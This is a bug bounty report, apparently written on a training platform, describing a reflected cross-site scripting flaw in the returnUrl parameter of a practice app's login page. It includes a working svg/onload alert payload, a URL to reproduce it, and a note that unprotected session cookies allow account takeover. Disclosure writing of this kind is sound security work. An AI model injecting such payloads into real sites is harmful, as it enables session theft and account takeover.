https://www.bugbountyhunter.com
Report title:Reflected Cross-Site Scripting XSS
Endpoint:https://7b6ae0ae6c79-sec875.a.barker-social.com/login
Vulnerable Parameter:returnUrl
Payload:https://7b6ae0ae6c79-sec875.a.barker-social.com/login?returnUrl=%2F"><svg/onload=alert(0)>
正文
l have discovered a reflection XSS vulnerability affecting the endpoint 'login' in the parameter 'returnUrl'. The payloed requires no filter bypass and is a simple, '"><svg/onload=alert(0)>'
You can see a working proof of concept here:
To reproduce:
1.Go to the barker app login page, Discover the returnUrl parameter
2.Visit https://7b6ae0ae6c79-sec875.a.barker-social.com/login?returnUrl=%2F%22%3E%3Csvg/onload=alert(0)%3E
3.You will observe xss executes
Payload used: "><svg/onload=alert(0)>.No filtering at all.
Vulnerable parameter: returnUrl
Endpoint/URL: https://7b6ae0ae6c79-sec875.a.barker-social.com/login
lmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.